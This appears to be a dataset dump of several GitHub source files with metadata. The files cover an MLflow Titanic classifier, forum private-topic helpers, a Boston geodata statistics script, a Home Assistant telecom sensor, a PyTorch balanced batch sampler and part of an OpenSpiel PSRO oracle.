"alien.x", "line_number": 246, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 247, "usage_type": "attribute"}, {"api_name": "alien.x", "line_number": 247, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 248, "usage_type": "attribute"}, {"api_name": "alien.check_edges", 
"line_number": 254, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 263, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 272, "usage_type": "attribute"}, {"api_name": "bullet.draw_bullet", "line_number": 282, "usage_type": "call"}, {"api_name": "pygame.mouse.display.flip", "line_number": 294, "usage_type": "call"}, {"api_name": "pygame.mouse.display", "line_number": 294, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 294, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 315, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse.set_visible", "line_number": 318, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse", "line_number": 318, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 318, "usage_type": "name"}]} +{"seq_id": "30116020395", "text": "import os\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import (accuracy_score,\n precision_score,\n recall_score,\n f1_score,\n confusion_matrix,\n roc_curve,\n roc_auc_score,\n precision_recall_curve,\n average_precision_score)\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nimport matplotlib.pyplot as plt\nimport math\nimport mlflow\nDATA_DIR = './data'\nDATASET_PATH = os.path.join(DATA_DIR,'Titanic+Data+Set.csv')\nPROCESSED_DATASET_PATH = os.path.join(DATA_DIR,'Titanic+Data+Set+Preprocess.csv')\n\n\ndef train_model(model, x_train, y_train):\n model.fit(x_train, y_train)\n\ndef evaluate_model(model, x_test, y_test):\n predictions = model.predict(x_test)\n rmse = math.sqrt(mean_squared_error(y_test,predictions))\n print(rmse)\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.log_metric(\"precision\", precision_score(y_test,predictions))\n mlflow.log_metric(\"acc_score\", accuracy_score(y_test,predictions))\n mlflow.log_metric(\"f1_score\", f1_score(y_test,predictions))\n mlflow.log_metric(\"recall_score\", recall_score(y_test,predictions))\n\n\n\n\nif __name__ == '__main__':\n data = pd.read_csv(PROCESSED_DATASET_PATH)\n\n\n ## Split the data \n train, test = train_test_split(data, test_size=0.2)\n\n X = train.drop('Survived', axis=1)\n y = train['Survived']\n\n X_test = test.drop('Survived', axis=1)\n y_test = test['Survived']\n\n \n \n estimators= [10, 20, 30, 40]\n max_features=['auto','sqrt']\n\n #mlflow.create_experiment(\"titanic\")\n mlflow.set_experiment(\"titanic\")\n for max_feature in max_features:\n for f in range(len(estimators)):\n \n with mlflow.start_run():\n n_estimators = estimators[f]\n mlflow.log_param(\"n_estimators\",n_estimators)\n mlflow.log_param(\"max_feature\",max_feature)\n model = RandomForestClassifier(n_estimators=n_estimators,max_features=max_feature ,random_state=0)\n train_model(model, X, y)\n evaluate_model(model, X_test, y_test)\n mlflow.sklearn.log_model(model, \"RandomForestClassifier\")\n print(\"model run:\", mlflow.active_run().info.run_uuid)\n mlflow.end_run()", "repo_name": "chandana-srinivas/gl_mlflow_assignment", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2591, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 
22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 30, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 32, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 33, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 34, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 35, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 46, "usage_type": "call"}, {"api_name": "mlflow.set_experiment", "line_number": 60, "usage_type": "call"}, {"api_name": "mlflow.start_run", "line_number": 64, "usage_type": "call"}, {"api_name": "mlflow.log_param", "line_number": 66, "usage_type": "call"}, {"api_name": "mlflow.log_param", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 68, "usage_type": "call"}, {"api_name": "mlflow.sklearn.log_model", "line_number": 71, "usage_type": "call"}, {"api_name": "mlflow.sklearn", "line_number": 71, "usage_type": "attribute"}, {"api_name": "mlflow.active_run", "line_number": 72, "usage_type": "call"}, {"api_name": "mlflow.end_run", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "39613600704", "text": "from datetime import datetime\n\nfrom zds.utils.templatetags.emarkdown import emarkdown\n\n\nclass LeavePrivateTopic:\n \"\"\"\n Leave a private topic.\n \"\"\"\n\n def perform_destroy(self, topic):\n if topic.one_participant_remaining():\n topic.delete()\n else:\n topic.remove_participant(self.get_current_user())\n topic.save()\n\n def get_current_user(self):\n raise NotImplementedError(\"`get_current_user()` must be implemented.\")\n\n\nclass UpdatePrivatePost:\n \"\"\"\n Updates a private topic.\n \"\"\"\n\n def perform_update(self, instance, data, hat=None):\n instance.hat = hat\n instance.text = data.get(\"text\")\n instance.text_html = emarkdown(data.get(\"text\"))\n instance.update = datetime.now()\n instance.save()\n return instance\n", "repo_name": "zestedesavoir/zds-site", "sub_path": "zds/mp/commons.py", "file_name": "commons.py", "file_ext": "py", "file_size_in_byte": 824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 262, "dataset": "github-code", "pt": "61", "api": [{"api_name": "zds.utils.templatetags.emarkdown.emarkdown", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "32407755075", "text": "from urllib.request import urlopen\nimport json\nimport pymongo\nimport datetime\nimport uuid\nimport time\nimport ssl\nimport random\nfrom math import radians, sin, cos, atan2, sqrt\nimport scipy.stats as ss\nfrom sklearn.cluster import k_means\nfrom geopy.distance import vincenty as Distance\nfrom shapely.geometry import shape, 
Point, Polygon\nimport numpy as np\nimport sys\n\ndef union(R, S):\n return R + S\n\ndef difference(R, S):\n return [t for t in R if t not in S]\n\ndef intersect(R, S):\n return [t for t in R if t in S]\n\ndef project(R, p):\n return [p(t) for t in R]\n\ndef select(R, s):\n return [t for t in R if s(t)]\n \ndef product(R, S):\n return [(t,u) for t in R for u in S]\n\ndef aggregate(R, f):\n keys = {r[0] for r in R}\n return [(key, f([v for (k,v) in R if k == key])) for key in keys]\n\nclient = pymongo.MongoClient()\nrepo = client['biel_otis']\nrepo.authenticate('biel_otis', 'biel_otis')\n\nuserZip = sys.argv[1]\nuserLat = float(sys.argv[2])\nuserLng = float(sys.argv[3])\n\nretDict = {}\n\nobesityValues = list(repo['biel_otis.ObesityData'].find({\"cityname\": \"Boston\"}))\npropertyValues = list(repo['biel_otis.PropertyValues'].find({\"OWNER_MAIL_ZIPCODE\": userZip + \"_\"}))\nmapValues = list(repo['biel_otis.BostonZoning'].find())\ncorrelations = list(repo['biel_otis.ObesityPropertyCorrelation'].find())\n\ntotal_propVal = 0\ncount = 0\nfor x in propertyValues:\n total_propVal += float(x['AV_TOTAL'])\n count += 1\n\nif count != 0:\n retDict[\"AveragePropVal\"] = total_propVal / count\nelse:\n retDict[\"AveragePropVal\"] = 0\n\n\nobeseAgg = [('*', 1) for x in obesityValues if Distance((float(x[\"geolocation\"][\"latitude\"]), float(x[\"geolocation\"][\"longitude\"])), (userLat, userLng)).miles < 1.0]\ntotal = aggregate(obeseAgg, sum)\n\nif (total != []):\n retDict[\"TotalObese\"] = total[0][1]\n\nfor f in mapValues[0]:\n if (f == '_id'):\n continue\n else:\n if (f == \"South Boston\" or f == \"South Boston Neighborhood\"):\n mapValues[0][f]['coordinates'][0][0] = [(x,y) for (y,x) in mapValues[0][f]['coordinates'][0][0]]\n else:\n mapValues[0][f]['coordinates'][0] = [(x,y) for (y,x) in mapValues[0][f]['coordinates'][0]]\n \np = Point(userLat, userLng)\nneighborhood = \"\"\nfor f in mapValues[0]:\n if (f == \"_id\"):\n continue\n else:\n poly = shape(mapValues[0][f])\n if (poly.contains(p)):\n neighborhood = f\n\nif (neighborhood != \"\"):\n retDict['CorrelationCoefficient'] = correlations[0][neighborhood]\n\nretDict[\"lat\"] = userLat\nretDict[\"lng\"] = userLng\n\nprint(str(retDict))\n\n\n", "repo_name": "data-mechanics/course-2017-fal-proj", "sub_path": "biel_otis/visualization/visualizationStats.py", "file_name": "visualizationStats.py", "file_ext": "py", "file_size_in_byte": 2554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 45, "usage_type": "attribute"}, {"api_name": "geopy.distance.vincenty", "line_number": 66, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 81, "usage_type": "call"}, {"api_name": "shapely.geometry.shape", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "17406994221", "text": "import logging\n\nfrom .const import 
(\n\tCONF_CLIENT,\n\tCONF_PLATFORM,\n\tCONF_SEPARATE_DATA_SENSORS,\n\tDOMAIN,\n\tUPDATE_INTERVAL,\n\tHA_ATTRIBUTION,\n\tHA_LAST_RECORD,\n\tHA_PHONENUMBER,\n\tHA_SPACE,\n\tHA_TOTAL,\n\tHA_UNIT_OF_MEASUREMENT_DATA,\n\tHA_UNIT_OF_MEASUREMENT_SUBSCRIPTION,\n\tHA_USED,\n\tHA_USERNAME,\n\tHA_USERS,\n\tR_BALANCE,\n\tR_DATA,\n\tR_DATE,\n\tR_PHONENUMBER,\n\tR_USERNAME,\n\tSTR_NAME,\n\tSTR_PACKAGE,\n\tSTR_USERS,\n\tSTR_USED,\n)\nfrom homeassistant.const import DEVICE_CLASS_MONETARY, ATTR_ATTRIBUTION\n\nfrom datetime import datetime, timedelta\n\nfrom homeassistant.components.sensor import SensorEntity\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed\n\n_LOGGER: logging.Logger = logging.getLogger(__package__)\n_LOGGER = logging.getLogger(__name__)\n\nasync def async_setup_platform(hass, config, async_add_entities, discovery_info = None):\n\t\"\"\"Setup sensor platform\"\"\"\n\n\tasync def async_update_data():\n\t\t# try:\n\t\tclient = hass.data[DOMAIN][CONF_CLIENT]\n\t\tawait hass.async_add_executor_job(client.getData)\n\t\t# except Exception as e:\n\t\t# \traise UpdateFailed(f\"Error communicating with server: {e}\")\n\n\tcoordinator = DataUpdateCoordinator(\n\t\thass,\n\t\t_LOGGER,\n\t\tname = CONF_PLATFORM,\n\t\tupdate_method = async_update_data,\n\t\tupdate_interval = timedelta(minutes = UPDATE_INTERVAL)\n\t)\n\n\t# Immediate refresh\n\tawait coordinator.async_request_refresh()\n\n\t# Add the sensors\n\tclient = hass.data[DOMAIN][CONF_CLIENT]\n\tentities = []\n\t\n\tfor subscription in client._subscriptions:\n\t\tentities.append(SubscriptionSensor(hass, coordinator, subscription))\n\n\tif hass.data[DOMAIN][CONF_SEPARATE_DATA_SENSORS]:\n\t\tfor phoneNo in client._packageAndConsumption:\n\t\t\tentities.append(DataSensor(hass, coordinator, phoneNo, client._users[phoneNo]))\n\n\tasync_add_entities(entities)\n\nclass SubscriptionSensor(SensorEntity):\n\tdef __init__(self, hass, coordinator, subscription) -> None:\n\t\tself._hass = hass\n\t\tself._coordinator = coordinator\n\t\tself._subscription = subscription\n\t\tself._client = hass.data[DOMAIN][CONF_CLIENT]\n\n\t@property\n\tdef name(self) -> str:\n\t\tname = DOMAIN + HA_SPACE\n\t\tif len(self._subscription[STR_USERS]) > 1:\n\t\t\tname += self._subscription[STR_NAME]\n\t\telse:\n\t\t\tname += str(self._subscription[STR_USERS][0][R_PHONENUMBER])\n\t\treturn name\n\n\t@property\n\tdef state(self):\n\t\treturn self._subscription[R_BALANCE]\n\n\t@property\n\tdef unit_of_measurement(self) -> str:\n\t\treturn HA_UNIT_OF_MEASUREMENT_SUBSCRIPTION\n\n\t@property\n\tdef unique_id(self):\n\t\treturn DOMAIN + \"_\" + str(self._subscription[STR_USERS][0][R_PHONENUMBER])\n\n\t@property\n\tdef device_class(self) -> str:\n\t\treturn DEVICE_CLASS_MONETARY\n\n\t@property\n\tdef extra_state_attributes(self):\n\t\t# Prepare a dictionary with attributes\n\t\tattr = { ATTR_ATTRIBUTION: HA_ATTRIBUTION, HA_USERS: [] }\n\n\t\t# Extract Username, Phonenumber and Consumption from the subscription\n\t\tfor user in self._subscription[STR_USERS]:\n\t\t\tphoneNo = user[R_PHONENUMBER]\n\t\t\tattr[HA_USERS].append( { HA_USERNAME: user[R_USERNAME], HA_PHONENUMBER: phoneNo} )\n\t\t\tif R_DATE in self._client._packageAndConsumption[phoneNo]:\n\t\t\t\tattr[HA_LAST_RECORD] = self._client._packageAndConsumption[phoneNo][R_DATE]\n\t\t\tfor key in self._client._packageAndConsumption[phoneNo][STR_USED]:\n\t\t\t\tnewKey = (key + HA_SPACE + HA_USED).lower()\n\t\t\t\tif newKey not in attr:\n\t\t\t\t\tattr[newKey] = 0\n\t\t\t\tattr[newKey] += 
self._client._packageAndConsumption[phoneNo][STR_USED][key]\n\n\t\t# Extract Package info from the first User\n\t\tphoneNo = self._subscription[STR_USERS][0][R_PHONENUMBER]\n\t\tfor key in self._client._packageAndConsumption[phoneNo][STR_PACKAGE]:\n\t\t\tattr[(key + HA_SPACE + HA_TOTAL).lower()] = self._client._packageAndConsumption[phoneNo][STR_PACKAGE][key]\n\n\t\treturn attr\n\n\t@property\n\tdef should_poll(self):\n\t\t\"\"\"No need to poll. Coordinator notifies entity of updates.\"\"\"\n\t\treturn False\n\n\t@property\n\tdef available(self):\n\t\t\"\"\"Return if entity is available.\"\"\"\n\t\treturn self._coordinator.last_update_success\n\n\tasync def async_update(self):\n\t\t\"\"\"Update the entity. Only used by the generic entity update service.\"\"\"\n\t\tawait self._coordinator.async_request_refresh()\n\n\tasync def async_added_to_hass(self):\n\t\t\"\"\"When entity is added to hass.\"\"\"\n\t\tself.async_on_remove(\n\t\t\tself._coordinator.async_add_listener(\n\t\t\t\tself.async_write_ha_state\n\t\t\t)\n\t\t)\n\nclass DataSensor(SensorEntity):\n\tdef __init__(self, hass, coordinator, phoneNo, userName = '') -> None:\n\t\tself._hass = hass\n\t\tself._coordinator = coordinator\n\t\tself._phoneNo = phoneNo\n\t\tself._userName = userName\n\t\tself._client = hass.data[DOMAIN][CONF_CLIENT]\n\t\tself._name = DOMAIN + HA_SPACE + str(self._phoneNo) + HA_SPACE + R_DATA + HA_SPACE + HA_USED\n\t\tself._state = 0\n\t\tself._total = 0\n\t\tif R_DATA in self._client._packageAndConsumption[self._phoneNo][STR_USED]:\n\t\t\tself._state = self._client._packageAndConsumption[self._phoneNo][STR_USED][R_DATA]\n\t\tif R_DATA in self._client._packageAndConsumption[self._phoneNo][STR_PACKAGE]:\n\t\t\tself._total = self._client._packageAndConsumption[self._phoneNo][STR_PACKAGE][R_DATA]\n\n\t@property\n\tdef name(self) -> str:\n\t\treturn self._name\n\n\t@property\n\tdef state(self):\n\t\treturn self._state\n\n\t@property\n\tdef unit_of_measurement(self) -> str:\n\t\treturn HA_UNIT_OF_MEASUREMENT_DATA\n\n\t@property\n\tdef unique_id(self):\n\t\treturn self._name\n\n\t@property\n\tdef extra_state_attributes(self):\n\t\t# Prepare a dictionary with attributes\n\t\tattr = { ATTR_ATTRIBUTION: HA_ATTRIBUTION }\n\t\tattr[(R_DATA + HA_SPACE + HA_TOTAL).lower()] = self._total\n\t\tattr[HA_USERNAME] = self._userName\n\t\tattr[HA_PHONENUMBER] = self._phoneNo\n\t\tif R_DATE in self._client._packageAndConsumption[self._phoneNo]:\n\t\t\tattr[(R_DATE).lower()] = self._client._packageAndConsumption[self._phoneNo][R_DATE]\n\n\t\treturn attr\n\n\t@property\n\tdef should_poll(self):\n\t\t\"\"\"No need to poll. Coordinator notifies entity of updates.\"\"\"\n\t\treturn False\n\n\t@property\n\tdef available(self):\n\t\t\"\"\"Return if entity is available.\"\"\"\n\t\treturn self._coordinator.last_update_success\n\n\tasync def async_update(self):\n\t\t\"\"\"Update the entity. 
Only used by the generic entity update service.\"\"\"\n\t\tawait self._coordinator.async_request_refresh()\n\n\tasync def async_added_to_hass(self):\n\t\t\"\"\"When entity is added to hass.\"\"\"\n\t\tself.async_on_remove(\n\t\t\tself._coordinator.async_add_listener(\n\t\t\t\tself.async_write_ha_state\n\t\t\t)\n\t\t)", "repo_name": "J-Lindvig/HomeAssistant", "sub_path": "custom_components/greentel/sensor.py", "file_name": "sensor.py", "file_ext": "py", "file_size_in_byte": 6227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.Logger", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 37, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 44, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 44, "usage_type": "name"}, {"api_name": "homeassistant.helpers.update_coordinator.DataUpdateCoordinator", "line_number": 49, "usage_type": "call"}, {"api_name": "const.CONF_PLATFORM", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 54, "usage_type": "call"}, {"api_name": "const.UPDATE_INTERVAL", "line_number": 54, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 61, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 61, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 67, "usage_type": "name"}, {"api_name": "const.CONF_SEPARATE_DATA_SENSORS", "line_number": 67, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorEntity", "line_number": 73, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 78, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 78, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 82, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 82, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 83, "usage_type": "name"}, {"api_name": "const.STR_NAME", "line_number": 84, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 86, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 86, "usage_type": "name"}, {"api_name": "const.R_BALANCE", "line_number": 91, "usage_type": "name"}, {"api_name": "const.HA_UNIT_OF_MEASUREMENT_SUBSCRIPTION", "line_number": 95, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 99, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 99, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 99, "usage_type": "name"}, {"api_name": "homeassistant.const.DEVICE_CLASS_MONETARY", "line_number": 103, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_ATTRIBUTION", "line_number": 108, "usage_type": "name"}, {"api_name": "const.HA_USERS", "line_number": 108, "usage_type": "name"}, {"api_name": "const.HA_ATTRIBUTION", "line_number": 108, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 111, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 112, "usage_type": "name"}, {"api_name": "const.HA_USERS", "line_number": 113, "usage_type": "name"}, {"api_name": "const.HA_USERNAME", "line_number": 113, "usage_type": "name"}, {"api_name": "const.HA_PHONENUMBER", "line_number": 113, "usage_type": "name"}, {"api_name": "const.R_USERNAME", "line_number": 113, "usage_type": "name"}, 
{"api_name": "const.R_DATE", "line_number": 114, "usage_type": "name"}, {"api_name": "const.HA_LAST_RECORD", "line_number": 115, "usage_type": "name"}, {"api_name": "const.R_DATE", "line_number": 115, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 116, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 117, "usage_type": "name"}, {"api_name": "const.HA_USED", "line_number": 117, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 120, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 123, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 123, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 124, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 125, "usage_type": "name"}, {"api_name": "const.HA_TOTAL", "line_number": 125, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 125, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorEntity", "line_number": 151, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 157, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 157, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 158, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 158, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 158, "usage_type": "name"}, {"api_name": "const.HA_USED", "line_number": 158, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 161, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 161, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 162, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 162, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 163, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 163, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 164, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 164, "usage_type": "name"}, {"api_name": "const.HA_UNIT_OF_MEASUREMENT_DATA", "line_number": 176, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_ATTRIBUTION", "line_number": 185, "usage_type": "name"}, {"api_name": "const.HA_ATTRIBUTION", "line_number": 185, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 186, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 186, "usage_type": "name"}, {"api_name": "const.HA_TOTAL", "line_number": 186, "usage_type": "name"}, {"api_name": "const.HA_USERNAME", "line_number": 187, "usage_type": "name"}, {"api_name": "const.HA_PHONENUMBER", "line_number": 188, "usage_type": "name"}, {"api_name": "const.R_DATE", "line_number": 189, "usage_type": "name"}, {"api_name": "const.R_DATE.lower", "line_number": 190, "usage_type": "call"}, {"api_name": "const.R_DATE", "line_number": 190, "usage_type": "name"}]} +{"seq_id": "39680638192", "text": "from typing import List, Optional\n\nimport numpy as np\nfrom torch.utils.data.sampler import Sampler\n\nfrom aikido.__api__.kata import LabelAware\n\n\nclass BalancedBatchSampler(Sampler[List[int]]):\n \"\"\"\n tbd\n \"\"\"\n\n def __init__(self, kata: LabelAware, n_classes, n_samples, seed: Optional[int] = None):\n super().__init__(kata)\n self.random_state = np.random.RandomState(seed)\n self.labels = kata.get_labels()\n self.labels_set = list(set(np.array(self.labels)))\n self.label_to_indices = {label: 
np.where(np.array(self.labels) == label)[0]\n for label in self.labels_set}\n for l in self.labels_set:\n self.random_state.shuffle(self.label_to_indices[l])\n self.used_label_indices_count = {label: 0 for label in self.labels_set}\n self.count = 0\n self.n_classes = n_classes\n self.n_samples = n_samples\n self.n_dataset = len(self.labels)\n self.batch_size = self.n_samples * self.n_classes\n\n def __iter__(self):\n self.count = 0\n while self.count + self.batch_size < self.n_dataset:\n classes = self.random_state.choice(self.labels_set, self.n_classes, replace=False)\n indices = []\n for class_ in classes:\n indices.extend(self.label_to_indices[class_][\n self.used_label_indices_count[class_]:self.used_label_indices_count[\n class_] + self.n_samples])\n self.used_label_indices_count[class_] += self.n_samples\n if self.used_label_indices_count[class_] + self.n_samples > len(self.label_to_indices[class_]):\n np.random.shuffle(self.label_to_indices[class_])\n self.used_label_indices_count[class_] = 0\n\n while len(indices) < self.batch_size:\n indices.append(self.random_state.choice(indices))\n\n yield indices\n self.count += self.n_classes * self.n_samples\n\n def __len__(self):\n return self.n_dataset // self.batch_size\n", "repo_name": "c7nw3r/aikido", "sub_path": "aikido/kata/sampler/balanced_batch_sampler.py", "file_name": "balanced_batch_sampler.py", "file_ext": "py", "file_size_in_byte": 2130, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.sampler.Sampler", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 9, "usage_type": "name"}, {"api_name": "aikido.__api__.kata.LabelAware", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}, {"api_name": "numpy.random.RandomState", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "20404762564", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n# from open_spiel.python.algorithms.psro_variations import abstract_meta_trainer\nimport abstract_meta_trainer\nfrom sklearn import preprocessing\nimport itertools\n\n\nclass AbstractOracle(object):\n \"\"\"The abstract class representing oracles, a hidden optimization process.\"\"\"\n\n def __init__(self,\n number_policies_sampled=100,\n number_episodes_sampled=10,\n nb_players=2,\n **unused_oracle_specific_kwargs):\n \"\"\"Initialization method for oracle.\n Args:\n number_policies_sampled: Number of different opponent policies sampled\n during evaluation of policy.\n number_episodes_sampled: Number of episodes sampled to estimate the return\n of different opponent policies.\n **unused_oracle_specific_kwargs: Oracle specific args, compatibility\n purpose. 
Since oracles can vary so much in their implementation, no\n specific argument constraint is put on this function.\n \"\"\"\n self._number_policies_sampled = number_policies_sampled\n self._number_episodes_sampled = number_episodes_sampled\n self.l_card = [[] for _ in range(nb_players)]\n self.nb_players = nb_players\n\n def set_iteration_numbers(self, number_policies_sampled,\n number_episodes_sampled):\n \"\"\"Changes the number of iterations used for computing episode returns.\n Args:\n number_policies_sampled: Number of different opponent policies sampled\n during evaluation of policy.\n number_episodes_sampled: Number of episodes sampled to estimate the return\n of different opponent policies.\n \"\"\"\n self._number_policies_sampled = number_policies_sampled\n self._number_episodes_sampled = number_episodes_sampled\n\n def __call__(self, game, policy, total_policies, current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs):\n \"\"\"Call method for oracle, returns best response against a set of policies.\n Args:\n game: The game on which the optimization process takes place.\n policy: The current policy, in policy.Policy, from which we wish to start\n optimizing.\n total_policies: A list of all policy.Policy strategies used for training,\n including the one for the current player.\n current_player: Integer representing the current player.\n probabilities_of_playing_policies: A list of arrays representing, per\n player, the probabilities of playing each policy in total_policies for\n the same player.\n **oracle_specific_execution_kwargs: Other set of arguments, for\n compatibility purposes. Can for example represent whether to Rectify\n Training or not.\n \"\"\"\n raise NotImplementedError(\"Calling Abstract class method.\")\n\n def evaluate_policy(self, game, pol, total_policies, current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs):\n \"\"\"Evaluates a specific policy against a nash mixture of policies.\n Args:\n game: The game on which the optimization process takes place.\n pol: The current policy, in policy.Policy, from which we wish to start\n optimizing.\n total_policies: A list of all policy.Policy strategies used for training,\n including the one for the current player.\n current_player: Integer representing the current player.\n probabilities_of_playing_policies: A list of arrays representing, per\n player, the probabilities of playing each policy in total_policies for\n the same player.\n **oracle_specific_execution_kwargs: Other set of arguments, for\n compatibility purposes. 
Can for example represent whether to Rectify\n Training or not.\n Returns:\n Average return for policy when played against policies_played_against.\n \"\"\"\n rectify_training = oracle_specific_execution_kwargs.get(\"rectify_training\")\n\n totals = 0\n count = 0\n for _ in range(self._number_policies_sampled):\n # For Rectified Nash, it's necessary to make sure that we're only\n # including policies against which the evaluated policy wins on\n # expectation, which forces us to make multiple runs per policy.\n\n policies_selected = []\n for k in range(len(total_policies)):\n if k == current_player:\n policies_selected.append(pol)\n else:\n selected_opponent = np.random.choice(\n total_policies[k],\n 1,\n False,\n p=probabilities_of_playing_policies[k]).reshape(-1)[0]\n policies_selected.append(selected_opponent)\n\n policy_total = 0\n for _ in range(self._number_episodes_sampled):\n new_return = abstract_meta_trainer.sample_episode(\n game.new_initial_state(),\n policies_selected).reshape(-1)[current_player]\n policy_total += new_return\n policy_total /= self._number_episodes_sampled\n\n if rectify_training:\n gain_on_average = int(policy_total >= 0)\n policy_total = gain_on_average * policy_total\n 